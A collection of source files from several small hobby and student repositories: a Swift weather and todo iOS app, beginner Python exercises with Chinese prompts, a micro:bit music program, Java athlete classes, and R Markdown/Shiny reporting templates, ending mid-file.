self?.currentSummaryLabel.text = weather.currently?.summary
if let daileData = weather.daily?.data {
self?.dataSource.append(objectsIn: daileData)
}
self?.tableView.reloadData()
}
}
}
}
}
func getPersistanceWeather() {
if let weather = RealmService.shared.getWeather() {
self.dataSource = weather.daily?.data ?? List<DailyWeather>()
self.tableView.reloadData()
if let firstHour = weather.hourly?.data[1],
let secondHour = weather.hourly?.data[2],
let thirdHour = weather.hourly?.data[3] {
self.firstTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: firstHour.time)
self.secondTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: secondHour.time)
self.thirdTimeLabel.text = DateNormalizer.shared.normalizeWithHours(date: thirdHour.time)
self.firstTemperatureLabel.text = "\(String(firstHour.temperature))° C"
self.secondTemperatureLabel.text = "\(String(secondHour.temperature))° C"
self.thirdTemperatureLabel.text = "\(String(thirdHour.temperature))° C"
self.currentTemperatureLabel.text = "\(String(weather.currently?.temperature ?? 0))° C"
self.currentSummaryLabel.text = weather.currently?.summary
}
}
}
}
extension WeatherVC: UITabBarDelegate, UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return self.dataSource.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = self.tableView.dequeueReusableCell(withIdentifier: cellId) as! WeatherCell
cell.setup(weather: dataSource[indexPath.row])
return cell
}
}
<file_sep>//
// WeatherCell.swift
// mod13
//
// Created by <NAME> on 14/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class WeatherCell: UITableViewCell {
@IBOutlet weak var dateLabel: UILabel!
@IBOutlet weak var temperatureLabel: UILabel!
@IBOutlet weak var summaryLabel: UILabel!
override func awakeFromNib() {
super.awakeFromNib()
// Initialization code
}
override func setSelected(_ selected: Bool, animated: Bool) {
super.setSelected(selected, animated: animated)
// Configure the view for the selected state
}
func setup(weather: DailyWeather) {
self.dateLabel.text = DateNormalizer.shared.normalize(date: weather.time)
self.temperatureLabel.text = "\(String(weather.temperatureHigh))° C"
self.summaryLabel.text = weather.summary
}
}
<file_sep>//
// Todo.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import RealmSwift
class Todo: Object {
@objc dynamic var task: String = ""
}
<file_sep>//
// Weather.swift
// mod13
//
// Created by <NAME> on 14/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import Realm
import RealmSwift
@objcMembers class Currently: Object, Decodable {
dynamic var time: Double = 0
dynamic var temperature: Double = 0
dynamic var summary: String = ""
enum CodingKeys: String, CodingKey {
case time = "time"
case temperature = "temperature"
case summary = "summary"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
time = try container.decode(Double.self, forKey: .time)
temperature = try container.decode(Double.self, forKey: .temperature)
summary = try container.decode(String.self, forKey: .summary)
super.init()
}
override static func primaryKey() -> String? {
return "summary"
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class DailyWeather: Object, Decodable {
dynamic var time: Double = 0
dynamic var temperatureHigh: Double = 0
dynamic var summary: String = ""
enum CodingKeys: String, CodingKey {
case time = "time"
case temperatureHigh = "temperatureHigh"
case summary = "summary"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
time = try container.decode(Double.self, forKey: .time)
temperatureHigh = try container.decode(Double.self, forKey: .temperatureHigh)
summary = try container.decode(String.self, forKey: .summary)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Daily: Object, Decodable {
let data = RealmSwift.List<DailyWeather>()
enum CodingKeys: String, CodingKey {
case data = "data"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
let data = try container.decode([DailyWeather].self, forKey: .data)
self.data.append(objectsIn: data)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Hourly: Object, Decodable {
let data = RealmSwift.List<Currently>()
enum CodingKeys: String, CodingKey {
case data = "data"
}
required init(from decoder: Decoder) throws {
let container = try decoder.container(keyedBy: CodingKeys.self)
let data = try container.decode([Currently].self, forKey: .data)
self.data.append(objectsIn: data)
super.init()
}
required init() {
super.init()
}
required init(value: Any, schema: RLMSchema) {
super.init(value: value, schema: schema)
}
required init(realm: RLMRealm, schema: RLMObjectSchema) {
super.init(realm: realm, schema: schema)
}
}
@objcMembers class Weather: Object, Decodable {
dynamic var currently: Currently?
dynamic var daily: Daily?
dynamic var hourly: Hourly?
}
<file_sep>//
// CoreDataService.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import CoreData
class CoreDataService {
private init() {}
static let context = persistentContainer.viewContext
static var persistentContainer: NSPersistentContainer = {
let container = NSPersistentContainer(name: "mod14")
container.loadPersistentStores(completionHandler: { (storeDescription, error) in
if let error = error as NSError? {
fatalError("Unresolved error \(error), \(error.userInfo)")
}
})
return container
}()
static func saveContext () {
let context = persistentContainer.viewContext
if context.hasChanges {
do {
try context.save()
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
}
}
static func save(strTask: String) {
let task = Task(context: CoreDataService.context)
task.task = strTask
saveContext()
}
static func getTasks() -> [Task] {
var tasks: [Task] = []
let fetchRequest: NSFetchRequest<Task> = Task.fetchRequest()
do {
let result = try context.fetch(fetchRequest)
tasks = result
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
return tasks
}
static func remove(task: Task) {
let fetchRequest: NSFetchRequest<Task> = Task.fetchRequest()
do {
let result = try context.fetch(fetchRequest)
for item in result {
if item.task == task.task {
context.delete(item)
}
}
saveContext()
} catch {
let nserror = error as NSError
fatalError("Unresolved error \(nserror), \(nserror.userInfo)")
}
}
}
<file_sep>//
// DateNormalizer.swift
// mod13
//
// Created by <NAME> on 18/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class DateNormalizer {
static let shared = DateNormalizer()
let formatter = DateFormatter()
private init() {
formatter.locale = Locale(identifier: "ru")
}
func normalize(date: Double) -> String {
formatter.dateFormat = "dd MMMM"
let normDate = Date(timeIntervalSince1970: date)
let stringDate = formatter.string(from: normDate)
return stringDate
}
func normalizeWithHours(date: Double) -> String {
formatter.dateFormat = "HH:mm"
let normDate = Date(timeIntervalSince1970: date)
let stringDate = formatter.string(from: normDate)
return stringDate
}
}
<file_sep>//
// RealmSirvice.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
import RealmSwift
class RealmService {
static let shared = RealmService()
private let realm = try! Realm()
func getTasks() -> Results<Todo> {
return realm.objects(Todo.self)
}
func save(task: String) {
let todo = Todo()
todo.task = task
try! realm.write {
realm.add(todo)
}
}
func remove(todo: Todo) {
try! realm.write {
realm.delete(todo)
}
}
func getWeather() -> Weather? {
return realm.objects(Weather.self).first ?? nil
}
func saveWeather(weather: Weather) {
try! realm.write {
realm.add(weather, update: true)
}
}
}
<file_sep>//
// UserDefaultsService.swift
// mod14
//
// Created by <NAME> on 19/03/2019.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class UserDefaultsService {
static let shared = UserDefaultsService()
private let nameKey = "UserDefaultsService.nameKey"
private let surnameKey = "UserDefaultsService.surnameKey"
var name: String? {
set { UserDefaults.standard.set(newValue, forKey: nameKey) }
get { return UserDefaults.standard.string(forKey: nameKey) }
}
var surname: String? {
set { UserDefaults.standard.set(newValue, forKey: surnameKey) }
get { return UserDefaults.standard.string(forKey: surnameKey) }
}
}
| c957b1d8ee8e6c5fa125dbb82d3f2445c755ee1e | [
"Swift"
] | 11 | Swift | trantSolo/skillbox_mod14 | 7bcbcf91e53f67d23922308d52131ca77c2dad3f | 2db3bb57fdedfc6c474106ac3edb92740bd5c552 |
refs/heads/main | <file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Apr 17 12:32:13 2021
@author: c109156119
"""
def main():
ans=list(map(int,list(input("請輸入第一組數字"))))
ram=list(map(int,list(input("請輸入第二組數字"))))
a,b=0,0
for i in range(len(ram)):
if ram[i]== ans[i]:a+=1
elif ram[i] in ans:b+=1
if a ==len(ram):print(a,"A",b,"B","全對")
main()
<file_sep>a=int(input("輸入第一行正整數為: "))
b=input("第二行中數列中的數字為:").split()
if len(set(b)) == a:
print("每個數字剛好只出現1次")
else:
i=1
while True:
for j in list(set(b)): b.remove(j)
i+=1
if len(b) == 1:
print("最大出現次數的數字為:"+b[0])
print("出現次數為:"+str(i))
break
<file_sep>a=input("輸入一整數序列為: ").split()
b=set(a)
if len(b) > (len(a)+1)//2:
print("NO")
else:
while len(a) > 1:
for i in list(set(a)): a.remove(i)
print(a[0])
<file_sep>str1=input("輸入s1為:")
str2=input("輸入s2為:")
if len(str2.replace(str1, ""))!=len(str2):
print("YES")
else:
print("NO")<file_sep>list1=[]
list2=[]
a=int(input("輸入n值:"))
for i in range(a):
name=str(input("請輸入姓名:"))
email=str(input("請輸入電子郵件:"))
list1.append(name)
list2.append(email)
Who=str(input("請輸入要查詢電子郵件的姓名:"))
for i in range(len(list1)):
while(list1[i]==Who):
print(Who,"電子郵件帳號為",list2[i])
break<file_sep>m=int(input("請輸入階層值M:"))
N=0
x=1
while x<m:
N+=1
x*=N
print("超過M為",m,"的最小階層N值為",N)
<file_sep>ans=list("1234")
user=list(input(""))
a=0
b=0
for i in range(4):
if (ans[i]==user[i]):
a=a+1
else:
b=b+1
print(a,"A",b,"B")<file_sep>a = int(input("請輸入一正整數:"))
if a%2==0 and a%11==0 and a%5!=0 and a%7!=0:
print(str(a)+'為新公倍數?:YES')
else:
print(str(a)+'為新公倍數?:NO')
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 16:03:23 2021
@author: User
"""
def main():
m1={"1":72, "2":62, "3":82, "4":44,"5":60}
ma={"A":55,"B":68}
drink={"是":7,"否":0,}
fries={"是":13,"否":0}
money=0
meal= (input("主餐和聲及套餐:"))
# list 把輸入的東西分開來
money+=m1[meal[0]]
money+=ma[meal[1]]
money+=drink[input("是否升級大悲:")]
money+=fries[input("受否升級大暑:")]
print("總共為",str(money),"元")
main()<file_sep>dict1={"蘋果":"紅色","香蕉":"黃色","葡萄":"紫色","藍莓":"藍色","橘子":"橘色"}
key=list(dict1.keys())
print("dictˍkeys(",key[0],",",key[1],",",key[2],",",key[3],",",key[4],")")
food=str(input("請輸入水果:"))
if(food==key[0]):
print("蘋果是紅色")
elif(food==key[1]):
print("香蕉是黃色")
elif(food==key[2]):
print("葡萄是紫色")
elif(food==key[3]):
print("藍莓是藍色")
elif(food==key[4]):
print("橘子是橘色")
<file_sep>list1=[]
for i in range(10):
print("請輸入第",i+1,"個數字:",end="")
num=int(input())
list1.append(num)
list1.sort()
print("最大的3個數字為:",list1[9],",",list1[8],",",list1[7])
print("最小的3個數字為:",list1[2],",",list1[1],",",list1[0])
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 14:50:15 2021
@author: c109156119
"""
def main():
a = int(input())
b = int(input())
c = int(input())
x = [int((-b + (b**2 - 4*a*c)**0.5) / 2*a), int((-b - (b**2 - 4*a*c)**0.5) / 2*a)]
if sum(x) == 0: print(0)
else:
if 0 in x: x.remove(0)
print(x)
main()
<file_sep>a=str(input("輸入查詢的學號為:"))
b={"123":"Tom","456":"Cat","789":"Nana","321":"Lim","654":"Won"}
c=list(b.keys())
value=list(b.values())
if(a==c[0]):
print("學生資料為:",c[0],value[0],"DTGD")
elif(a==c[1]):
print("學生資料為:",c[1],value[1],"CSIE")
elif(a==c[2]):
print("學生資料為:",c[2],value[2],"ASIE")
elif(a==c[3]):
print("學生資料為:",c[3],value[3],"DBA")
elif(a==c[4]):
print("學生資料為:",c[4],value[4],"FDD")
<file_sep>a=input("輸入一字串為:")
print("There are",len(a),"characters")
<file_sep>an = list(input("輸入a n:"))
a = int(an[0])
n = int(an[2])
print(str(a*n)+'x**'+str(n-1))<file_sep>i=int(input("請輸入電費"))
summer=0
nosummer=0
Degree=0
if i>700:
Degree=i-701
summer+=Degree*5.63
nosummer+=Degree*4.50
i=700
if i>500 and i<701:
Degree=i-500
summer+=Degree*4.97
nosummer+=Degree*4.01
i=500
if i>330 and i<501:
Degree=i-330
summer+=Degree*4.39
nosummer+=Degree*3.61
i=330
if i>120 and i<331:
Degree=i-120
summer+=Degree*3.02
nosummer+=Degree*2.68
i=120
if i<121:
summer+=i*2.10
nosummer+=i*2.10
print('Summer month:'+str(summer))
print('noSummer month:'+str(nosummer))
<file_sep>M = int(input("小明身上有幾元:"))
N = int(input("販賣機有幾種飲料:"))
shopl = []
index = 0
for i in range(0,N):
shop = input("飲料價格:")
shopl.append(shop)
for x in shopl:
if M/int(x) > 1 or M/int(x) == 1:
index+=1
print(index)
<file_sep>animal=["rat","ox","tiger","rabbit","dragon","snake","horse","sheep","monkey","rooster","dog","pig"]
Year = int(input())
print(animal[(Year+8)%12])
1<file_sep>a = int(input("請輸入組數:"))
for i in range(1,a+1):
b = input("第"+str(i)+"組")
c=b.split(" ")
money=250*int(c[0])+175*int(c[1])
print("第"+str(i)+'組應收費用:'+str(money))
| 73c550ad6512581313a6620a6e45262fc6eaa102 | [
"Python"
] | 19 | Python | nkustC109156140/C109156140 | 28c4f4304f1d3a3e0894a94b807626bf7933732f | c4ee594028fb926d20f819297ef1b6da469678d7 |
refs/heads/master | <file_sep>package com.continuada.nbaapi;
public class JogadorBasquete extends Atleta {
private Double pontosPorJogo;
public JogadorBasquete(Integer idJogador, String nome, Integer idade, String posicao, Double salario, Double pontosPorJogo) {
super(idJogador, nome, idade, posicao, salario);
this.pontosPorJogo = pontosPorJogo;
}
public Double calcularValorMercado() {
return calcularValorIdade() + calcularValorPontosPorJogo() + calcularValorPosicao();
}
@Override
public Double calcularValorIdade() {
if(getIdade() >= 18 && getIdade() <= 24){
return getSalario() * 70.0;
}else if(getIdade() > 24 && getIdade()<= 26){
return getSalario() * 50.0;
}else if(getIdade() > 26 && getIdade() <= 30){
return getSalario() * 30.0;
}else if(getIdade() > 30){
return getSalario() * 15.0;
}else{
return getSalario() * 1.0;
}
}
@Override
public Double calcularValorPosicao() {
switch (getPosicao()) {
case "PG":
return getSalario() * 8.0;
case "SG":
return getSalario() * 5.0;
case "SF":
return getSalario() * 4.0;
case "PF":
return getSalario() * 3.0;
case "C":
return getSalario() * 2.0;
default:
return getSalario() * 1.0;
}
}
@Override
public Double calcularValorPontosPorJogo() {
if(this.pontosPorJogo < 5.0){
return getSalario() * 0.5;
}else if(this.pontosPorJogo < 10.0){
return getSalario() * 0.7;
}else if(this.pontosPorJogo < 15.0){
return getSalario() * 0.9;
}else if(this.pontosPorJogo < 20.0){
return getSalario() * 1.0;
}else if(this.pontosPorJogo < 80.0){
return getSalario() * 3.0;
}else{
return getSalario() * 1.0;
}
}
public Double getPontosPorJogo() {
return pontosPorJogo;
}
public void setPontosPorJogo(Double pontosPorJogo) {
this.pontosPorJogo = pontosPorJogo;
}
@Override
public String toString() {
return "Jogador{" +
"pontosPorJogo=" + pontosPorJogo +
"} " + super.toString();
}
}
<file_sep>package com.continuada.nbaapi;
public class JogadorFutebol extends Atleta{
private Integer gols;
public JogadorFutebol(Integer idJogador, String nome, Integer idade, String posicao, Double salario, Time time, Integer gols) {
super(idJogador, nome, idade, posicao, salario);
this.gols = gols;
}
@Override
public Double calcularValorIdade() {
if(getIdade() >= 18 && getIdade() <= 24){
return getSalario() * 70.0;
}else if(getIdade() > 24 && getIdade()<= 26){
return getSalario() * 50.0;
}else if(getIdade() > 26 && getIdade() <= 30){
return getSalario() * 30.0;
}else if(getIdade() > 30){
return getSalario() * 15.0;
}else{
return getSalario() * 1.0;
}
}
@Override
public Double calcularValorPosicao() {
switch (getPosicao()) {
case "GOL":
return getSalario() * 8.0;
case "DEF":
return getSalario() * 5.0;
case "MEIA":
return getSalario() * 4.0;
case "AT":
return getSalario() * 3.0;
default:
return getSalario() * 1.0;
}
}
@Override
public Double calcularValorPontosPorJogo() {
if(this.gols < 1.0){
return getSalario() * 0.5;
}else if(this.gols < 2.0){
return getSalario() * 0.7;
}else if(this.gols < 3.0){
return getSalario() * 0.9;
}else if(this.gols < 4.0){
return getSalario() * 1.0;
}else if(this.gols > 5.0){
return getSalario() * 3.0;
}else{
return getSalario() * 1.0;
}
}
@Override
public String toString() {
return "JogadorFutebol{" +
"gols=" + gols +
"} " + super.toString();
}
}
<file_sep>package com.continuada.nbaapi;
import org.omg.CosNaming.NamingContextExtPackage.StringNameHelper;
public abstract class Atleta {
private Integer idJogador;
private String nome;
private Integer idade;
private String posicao;
private Double salario;
public abstract Double calcularValorIdade();
public abstract Double calcularValorPosicao();
public abstract Double calcularValorPontosPorJogo();
public Atleta(Integer idJogador, String nome, Integer idade, String posicao, Double salario) {
this.idJogador = idJogador;
this.nome = nome;
this.idade = idade;
this.posicao = posicao;
this.salario = salario;
}
public Integer getIdJogador() {
return idJogador;
}
public void setIdJogador(Integer idJogador) {
this.idJogador = idJogador;
}
public String getNome() {
return nome;
}
public void setNome(String nome) {
this.nome = nome;
}
public Integer getIdade() {
return idade;
}
public void setIdade(Integer idade) {
this.idade = idade;
}
public String getPosicao() {
return posicao;
}
public void setPosicao(String posicao) {
this.posicao = posicao;
}
public Double getSalario() {
return salario;
}
public void setSalario(Double salario) {
this.salario = salario;
}
}
| a496626530320a6c39a81f726676e42db075907f | [
"Java"
] | 3 | Java | joaojacintho/bandtec-continuada | 01fead0fe5ab241ce4495cc6fca6703c11cc8591 | e9ef84dc092c5eccf7b56d0f2fc5f128f229a7f3 |
refs/heads/master | <repo_name>otajisan/my-first-microbit<file_sep>/main.ts
radio.onReceivedNumber(function on_received_number(receivedNumber: number) {
basic.showNumber(receivedNumber)
})
function on_first() {
count_down()
sing(opening())
}
function count_down() {
for (let num of [3, 2, 1]) {
basic.showNumber(num)
}
basic.showString("Go!")
}
function smile() {
basic.showAnimation(`
. . . . .
. # . # .
. . . . .
# . . . #
. # # # .
`)
}
input.onButtonPressed(Button.A, function on_button_pressed_a() {
sing_random_song()
})
radio.onReceivedString(function on_received_string(receivedString: string) {
basic.showString(receivedString)
})
function opening(): string {
return kirakiraboshi()[0]
}
function kirakiraboshi(): string[] {
return ["C - C - G - G - A - A - G - - -", "F - F - E - E - D - D - C - - -", "G - G - F - F - E - E - D - - -", "G - G - F - F - E - E - D - - -", "C - C - G - G - A - A - G - - -", "F - F - E - E - D - D - C - - -"]
}
function kaerunouta(): string[] {
return ["C - D - E - F - E - D - C - - -", "E - F - G - A - G - F - E - - -", "C - - - C - - - C - - - C - - -", "C C D D E E F F E - D - C - - -"]
}
function get_random_song(): string[] {
if (Math.randomBoolean()) {
return kaerunouta()
}
return kirakiraboshi()
}
function sing(song: string) {
basic.showIcon(IconNames.EigthNote)
let bpm = 240
music.playMelody(song, bpm)
}
function sing_random_song() {
sing(get_random_song().join(" "))
}
radio.setGroup(1)
radio.sendString(kirakiraboshi().join(" "))
on_first()
basic.forever(function on_forever() {
smile()
basic.clearScreen()
})
<file_sep>/main.py
def on_received_number(receivedNumber):
basic.show_number(receivedNumber)
radio.on_received_number(on_received_number)
def on_first():
count_down()
sing(opening())
def count_down():
for num in [3, 2, 1]:
basic.show_number(num)
basic.show_string("Go!")
def smile():
basic.show_animation("""
. . . . .
. # . # .
. . . . .
# . . . #
. # # # .
""")
def on_button_pressed_a():
sing_random_song()
input.on_button_pressed(Button.A, on_button_pressed_a)
def on_received_string(receivedString):
basic.show_string(receivedString)
radio.on_received_string(on_received_string)
def opening():
return kirakiraboshi()[0]
def kirakiraboshi():
return [
"C - C - G - G - A - A - G - - -",
"F - F - E - E - D - D - C - - -",
"G - G - F - F - E - E - D - - -",
"G - G - F - F - E - E - D - - -",
"C - C - G - G - A - A - G - - -",
"F - F - E - E - D - D - C - - -"
]
def kaerunouta():
return [
"C - D - E - F - E - D - C - - -",
"E - F - G - A - G - F - E - - -",
"C - - - C - - - C - - - C - - -",
"C C D D E E F F E - D - C - - -"
]
def get_random_song():
if Math.random_boolean():
return kaerunouta()
return kirakiraboshi()
def sing(song):
basic.show_icon(IconNames.EIGTH_NOTE)
bpm = 240
music.play_melody(song, bpm)
def sing_random_song():
sing(get_random_song().join(" "))
radio.set_group(1)
radio.send_string(kirakiraboshi().join(" "))
on_first()
def on_forever():
smile()
basic.clear_screen()
basic.forever(on_forever)
| 1ef211aed3548d91444399bd9055b449e664c931 | [
"Python",
"TypeScript"
] | 2 | TypeScript | otajisan/my-first-microbit | 8b379746e3dce0a9917b0966991e0a9e224a4d57 | ccd0cb8af657a0164fe3927764948e7c00d3ea3b |
refs/heads/master | <file_sep>---
title: "Analysis of the `r params$datasetName` dataset"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r copyStartTemplate, echo = FALSE, eval = FALSE}
# copy start template to working directory
library(exampleRTemplatePackage)
file.copy(from = getPathStartTemplate(), to = "./")
```
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleReportingPackage)
system.time(rmarkdown::render("startTemplate.Rmd"))
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
root.dir = params$outputPath
)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
dataset <- params$dataset
variables <- params$variables
covariate <- params$covariate
boxPlot <- params$boxPlot
histogram <- params$histogram
pairwiseComparison <- params$pairwiseComparison
typePlot <- params$typePlot
includeLda <- params$includeLda
outputPath <- params$outputPath
formatOutput <- params$formatOutput
```
<!-- call/run child template with the analysis, contained in the `exampleReportingPackage` package-->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<file_sep><!---
INPUT PARAMETERS
-->
```{r histogramChild-inputParameters-{{iH}}}
histogramVariableFull <- histogramVariablesFull[{{iHST}}]
histogramVariableDescription <- histogramVariablesDescription[{{iHST}}]
# color palette
library(oaColors)
colorPaletteH <- oaPalette(
numColors = nlevels(dataset[, covariate]), 1)
names(colorPaletteH) <- levels(dataset[, covariate])
message("Creation of histogram of ", histogramVariableDescription, ".")
```
## Histogram of `r histogramVariableDescription`
```{r histogramChild-figCaption-{{iH}}}
figCaption <- paste("Histogram of", histogramVariableDescription)
```
Figure \@ref(`r paste0("fig:histogramChild-plots-", {{iHST}})`) show the
histogram of the variable: `r histogramVariableDescription` for each
`r covariate` class.
```{r histogramChild-plots-{{iH}}, fig.cap = figCaption}
suppressPackageStartupMessages(library(ggplot2))
h <- ggplot(dataset, aes_string(x = histogramVariableFull, fill = covariate)) +
scale_color_manual(colorPaletteH) +
geom_histogram(alpha = 0.5) + geom_density(alpha = 0.8) +
theme_bw()
suppressPackageStartupMessages(library(plotly))
ggplotly(h)
```
```{r testDifferenceBetweenDistributions-{{iH}}}
# test difference beyween moyennes
resKruskalTest <- kruskal.test(x = dataset[, histogramVariableFull], g = dataset[, covariate])
resKruskalTestPVal <- resKruskalTest$p.value
```
The distributions of `r histogramVariableFull` is `r ifelse(resKruskalTest$p.value < 0.05, "different", "not different")`
in at least one of the `r covariate` group (_Kruskal-Wallis_ test: p-value =
`r format(resKruskalTest$p.value, scientific = TRUE, digits = 2)`
`r ifelse(resKruskalTest$p.value < 0.05, "<", ">=")` 0.05).<file_sep># Executed before ui.R and server.R
###############################################################################
library(exampleRTemplatePackage)
outputDir <- "."
source("./modules/shiny-modules.R")<file_sep>shinyUI(
fluidPage(
shinyjs::useShinyjs(),
includeCSS("./www/custom.css"),
fluidRow(column(1, img(src = "logo.png", float = "top", height = "60px", hspace = "50px")),
column(6, headerPanel("Example of R template package"))),
tags$br(),
fluidRow(
column(5,
helpText(paste("This application demonstrates the use of a R template package to",
"create semi-automate template analysis report.")),
h2("Data"),
helpText(paste("Please select dataset for the demonstration.")),
selectInput("dataset", "Dataset of interest",
choices = c("iris", 'warpbreaks',
'Pima Indians Diabetes', 'US states'
)
),
h2("Input parameters"),
helpText(paste("Please select input parameters for the choice of visualizations.",
"These parameters will be passed to the implemented template.")),
h3("Boxplot of variables"),
checkboxInput(inputId = "boxPlot",
"Visualize variable distribution with a boxplot",
value = TRUE, width = '100%'),
h3("Histogram of each variable by covariate"),
checkboxInput(inputId = "histogram",
"Visualize the distribution of each variable by covariate",
value = TRUE, width = '100%'),
conditionalPanel("output.moreThanOneVariable",
h3("Pairwise comparison plot"),
checkboxInput(inputId = "pairwiseComparison",
"Visualize pairs scatterplot of the variables",
value = TRUE, width = '100%'),
selectInput("typePlot", "Library used for the visualization",
c("static with base R" = "baseR", 'static with ggplot2' = "ggplot2",
'interactive with rbokeh' = "rbokeh", 'interactive with plotly' = "plotly"))
),
conditionalPanel("output.moreThanTwoVariables",
h3("Linear discriminant analysis"),
checkboxInput(inputId = "includeLda", "Include linear discriminant analysis", value = TRUE)
),
h2("Reporting"),
# call module
runReportShinyUI(id = "analysis", labelReport = "analysis")
)))
)<file_sep>
```{r ldaChild-inputParameters}
message(". Section linear discriminant analysis")
if(!exists("covariateLda", where = environment()))
stop("'The covariate used for the linear discriminant analysis should",
" be specified via the 'covariateLda' parameter'.")
```
The linear discriminant analysis of the dataset with the
`r paste0("'", covariateLda, "'")` response (equation: \@ref(eq:ldaDataset)) is
run with the `lda` function of the `MASS` package:
```{r ldaChild-printEquation}
cat("\\begin{equation}\n",
covariateLda, "\\sim",
paste(colnames(dataset)[colnames(dataset) != covariateLda], collapse = " + "),
"\n(\\#eq:ldaDataset)\n",
"\\end{equation}\n"
)
```
```{r ldaChild-runLda}
message("Run lda")
library(MASS)
resLda <- lda(as.formula(paste(covariateLda, "~ .")), data = dataset)
```
```{r ldaChild-plotLda, fig.width = 7, fig.height = 7}
message("Plot lda")
# color palette for the covariate
colorPalette <- oaPalette(
numColors = nlevels(dataset[, covariateLda]))
names(colorPalette) <- levels(dataset[, covariateLda])
# change color from hcl to hex
colorPaletteHex <- do.call(rgb, as.list(as.data.frame(t(col2rgb(colorPalette)/255))))
# code html list in R (don't forget line break before the list!) with colors
if(formatOutput == "html")
cat("Following Figure shows the lda biplot, with the following palette:\n\n")
cat(
paste(paste0("* <font color='", colorPaletteHex,"'>", names(colorPalette), "</font>"),
collapse = "\n")
)
# scatterplot of lda results
plot(resLda, dimen = 2,
col = colorPalette[dataset[, covariateLda]], cex = 0.4,
main = "Linear discriminant analysis"
)
```
```{r ldaChild-printDetailsLda}
message("Print details of lda results")
# extract details of the results of lda
resLdaDetails <- sapply(names(resLda), function(x) resLda[[x]], simplify = FALSE)
resLdaDetails <- resLdaDetails[sapply(resLdaDetails, length) > 0]
# use pander table to print details (can use list as input)
library(pander)
# create drop-down box with details of the results
switch(formatOutput,
'html' =
tmp <- collapseInHtml(
input = pander(resLdaDetails),
id = "resultsLda",
titleButton = "Details on the results of the linear discriminant analysis",
type = "text", color = "#0e1e29", borderColor = "#0e1e29"),
'pdf' = pander(resLdaDetails)
)
```<file_sep>---
title: "Start template, master file"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r copyStartTemplate, echo = FALSE, eval = FALSE}
# copy start template to working directory
library(exampleRTemplatePackage)
file.copy(from = getPathStartTemplate(), to = "./")
```
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleReportingPackage)
system.time(rmarkdown::render("startTemplate.Rmd"))
```
```{r inputOutputPath, echo = FALSE}
# output path (can differs than working directory)
outputPath <- file.path(getwd(), "output/")
if (!file.exists(outputPath)) dir.create(outputPath, recursive = TRUE)
# When working on a windows computer it should be "/Users/..." instead of "C:/Users/..."
if(.Platform$OS.type == "windows") outputPath <- paste0("/", paste(unlist(strsplit(outputPath, split = "/"))[-1], collapse = "/"),"/")
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
